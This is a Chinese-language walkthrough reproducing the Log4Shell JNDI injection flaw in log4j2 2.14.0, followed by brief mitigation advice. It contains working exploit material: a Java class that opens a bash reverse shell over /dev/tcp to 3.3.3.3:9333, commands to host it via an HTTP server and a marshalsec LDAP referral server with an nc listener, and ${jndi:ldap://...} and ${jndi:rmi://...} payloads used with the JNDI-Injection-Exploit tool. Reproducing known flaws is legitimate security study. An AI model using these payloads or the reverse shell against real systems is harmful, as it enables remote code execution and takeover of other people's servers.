0x00 使用log4j2的漏洞代码
JDK: 1.8.0_102
经测试在1.8.0_211下无法复现成功。
pom.xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
log4j.properties
##define an appender named console
log4j.appender.console=org.apache.log4j.ConsoleAppender
#The Target value is System.out or System.err
log4j.appender.console.Target=System.out
#set the layout type of the apperder
log4j.appender.console.layout=org.apache.log4j.PatternLayout
#set the layout format pattern
log4j.appender.console.layout.ConversionPattern=[%-5p] %m%n
##define a logger
log4j.rootLogger=TRACE,console
Main.java
package testlog4j;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Main {
public static void main(String[] args) {
Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME) ;
logger.error("hello world");
logger.error("${java:version}");
logger.error("${jndi:ldap://3.3.3.3:9999/TouchFile}");
}
}
0x01
利用类:
// javac shell_re.java
import java.lang.Runtime;
import java.lang.Process;
public class shell_re {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","exec 5<>/dev/tcp/3.3.3.3/9333;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
生成shell_re.class
javac shell_re.java
在当前目录开启httpserver服务,使之可以访问
python2 -m SimpleHTTPServer 9980
开启侦听端口
nc -lv 9333
0x02 使用marshelsec架设JNDI LDAPserver
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://3.3.3.3:9980/#shell_re" 9999
0x03 exploit
运行0x00中的代码,9333的端口处即可获得反弹shell。
0x04 修复
- 升级log4j2的版本到2.17.0
- 添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;
- 在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true
- JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;
0x05 使用JNDI-Injection-Exploit复现
- 运行JNDI-Injection-Exploit开启web服务以及LDAP服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
-C表示要执行的命令,-A表示侦听的IP
当前输出为:
[ADDRESS] >> 127.0.0.1
[COMMAND] >> /Applications/Calculator.app/Contents/MacOS/Calculator
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/gyzaiw
ldap://127.0.0.1:1389/gyzaiw
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/fkepkx
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/pc77qb
ldap://127.0.0.1:1389/pc77qb
----------------------------Server Log----------------------------
2021-12-23 15:18:00 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2021-12-23 15:18:00 [RMISERVER] >> Listening on 0.0.0.0:1099
2021-12-23 15:18:01 [LDAPSERVER] >> Listening on 0.0.0.0:1389
- 注入的代码
// use JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
logger.error("${jndi:ldap://127.0.0.1:1389/pc77qb}");
经测试,使用rmi协议也可以成功执行命令
logger.error("${jndi:rmi://127.0.0.1:1099/30pi00}");
- 运行即可打开计算器
注意:当-C参数指定的命令为反弹shell时,当漏洞机为mac时,无法反弹成功。使用Marshalsec可以成功。
References
https://mp.weixin.qq.com/s/iZtRamJ7g09fvuDIJdsy8Q
https://www.cnblogs.com/zh94/p/15681154.html
https://www.freebuf.com/articles/web/308238.html
//www.greatytc.com/p/35316d9a3b87
https://www.cnblogs.com/TJWater/p/15674995.html
